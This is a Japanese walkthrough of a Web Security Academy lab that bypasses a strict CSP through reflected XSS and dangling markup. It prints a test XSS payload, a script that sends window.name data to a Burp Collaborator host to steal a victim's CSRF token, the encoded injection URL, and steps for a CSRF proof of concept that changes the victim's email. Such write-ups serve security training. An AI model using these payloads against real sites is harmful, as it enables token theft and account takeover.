Hello there, ('ω')ノ
ぶら下がりマークアップ攻撃で非常に厳格なCSPで保護された反射型XSSを。
このラボでは、外部Webサイトへの送信要求をブロックする厳密なCSPを使用して。
ラボを解決するにはクロスサイトスクリプティングでCSPをバイパスして。
BurpCollaboratorを使用してCSRFトークンを盗み出して。
まずは、ログインして。
電子メールの変更機能をの脆弱性を確認して。
メールアドレスを変更して。
リクエストをリピータへ。
リクエストからもペイロードを試してレスポンス内容を確認して。
email="><img%20src=%20onerror=alert(1)>
コラボレータでペイロードをコピーして。
エクスプロイトサーバで下記のスクリプトを挿入して。
<script>
if(window.name) {
new Image().src='//tpmk842hfb966giifammbomdr4xulj.burpcollaborator.net?'+encodeURIComponent(window.name);
} else {
location = 'https://ac101f1b1eeeaf7d802dc061007700d4.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://ac0d1f4a1e42af4a8047c04b01b500b9.web-security-academy.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27';
}
</script>
%22%3E%3Ca%20
⇩
"><a
%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27
⇩
">Click me</a><base target='
Storeして、Viewでページを確認してからDeliverして。
ユーザがこのサイトにアクセスしてリンクをクリックすると。
CSRFトークンを悪意のあるWebサイトに送信して。
次にコラボレータのHTTPインタラクションをデコードして。
CSRFトークンを取得して。
value="ay0MXxt7xVnVKlJJXrKIT4RSQFs0qibR"
再度、電子メールをの変更を。
リクエストをインターセプトしてCSEF PoCへ。
オプションで自動送信スクリプトをチェックして。
メールアドレスと被害者から盗んだCSRFトークンを変更して。
Regenerateして、HTMLをコピーして。
インターセプトをオフにして。
エクスプロイトサーバに挿入して、Storeして。
Viewでエクスプロイトを確認してからDeliverすると。
クリアできた。
Best regards, (^^ゞ